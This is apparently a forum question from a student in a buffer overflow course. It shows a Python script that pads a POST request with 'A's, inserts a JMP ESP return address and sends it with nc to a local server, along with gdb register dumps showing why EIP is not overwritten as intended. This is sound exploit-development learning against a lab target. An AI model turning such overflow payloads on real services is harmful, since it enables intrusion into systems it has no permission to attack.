I am following a buffer overflow course, trying to overwrite the EIP using Python. The example script is as follows:
import os, sys
#JMP_ESP = 0x804cc6f
JMP_ESP = "\x6f\xcc\x04\x08"
w = open('./payload.txt', "w")
write = "POST "
write += "A"*1048 + JMP_ESP + "C"*(1400-1048-4)
w.write(write)
w.close()
os.system('echo $(cat payload.txt) | nc -nv 127.0.0.1 8080')
This dumps the string to payload.txt which we then send to the server using echo + nc. However, when you use "cat" on the payload.txt file you just get As + o + Cs, like this:
...AAAAAoCCCCCCC...(omitted)
If I open the file in vi I see this:
...AAAAoÌ^D^HCCCC...(omitted)
From gdb, this is what I see on in the EIP:
EDI: 0x8048c70 (<_start>: xor ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd5b0 ('C' <repeats 200 times>...)
EIP: 0xffffd70c --> 0x0
If I change it to "cat -v" I get this:
EDI: 0x8048c70 (<_start>: xor ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd5b0 ("^D^H", 'C' <repeats 196 times>...)
EIP: 0x4c2d4d6f ('oM-L')
Is there some special thing I need to do to when writing the file, opening it or creating the string to get this to work?